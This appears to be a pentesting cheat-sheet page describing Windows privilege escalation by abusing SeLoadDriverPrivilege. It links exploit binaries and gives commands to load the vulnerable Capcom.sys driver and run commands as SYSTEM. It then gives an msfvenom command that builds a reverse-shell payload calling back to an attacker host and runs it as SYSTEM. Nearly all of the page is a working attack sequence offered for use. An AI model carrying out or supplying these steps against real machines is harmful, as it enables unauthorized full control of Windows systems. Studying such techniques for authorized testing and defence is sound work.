# SeLoadDriver Privilege {% embed url="" %} {% embed url="" %} {% embed url="" %} {% embed url="" %} The last github has all the instructions. Upload the driver [eoploaddriver\_x64.exe](https://github.com/k4sth4/SeLoadDriverPrivilege/blob/main/eoploaddriver_x64.exe), [Capcom.sys file](https://github.com/k4sth4/SeLoadDriverPrivilege/blob/main/Capcom.sys), [ExploitCapcom.exe](https://github.com/k4sth4/SeLoadDriverPrivilege/blob/main/ExploitCapcom.exe) on target machine under writable directory. First we need to turn on the privilege of SeLoadDriverPrivilege that is disabled. ``` .\eoploaddriver_x64.exe System\\CurrentControlSet\\dfserv C:\\Temp\\Capcom.sys ``` Now using ExploitCapcom.exe load Capcom.sys to target machine. ``` .\ExploitCapcom.exe LOAD C:\Temp\Capcom.sys ``` After successfully loading Capcom.sys we can now run any cmd as privilege user with EXPLOIT keyword. ``` .\ExploitCapcom.exe EXPLOIT whoami ``` Now we can generate a revshell with msfvenom. You can also use other revshell. On Attacker vm. ``` msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.x.x LPORT=4444 -f exe > shell.exe ``` Upload it on Traget machine. Now execute the payload. ``` .\ExploitCapcom.exe EXPLOIT shell.exe ``` You gonna get reverse shell as SYSTEM. ![](https://3418038199-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyTPWZkKJbJfX8uHiRzmn%2Fuploads%2FputX4FkFfCxIb8bVD2Pf%2F2022-08-17_12-40.png?alt=media\&token=0e1d7f0e-c501-475c-ad4b-90eaf1e7d6e0) ![](https://3418038199-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyTPWZkKJbJfX8uHiRzmn%2Fuploads%2FqKuq5wE6Tar3IiH0s9fK%2F2022-08-17_12-41.png?alt=media\&token=fbe579f8-20ff-4991-997e-cc9e7501f55b)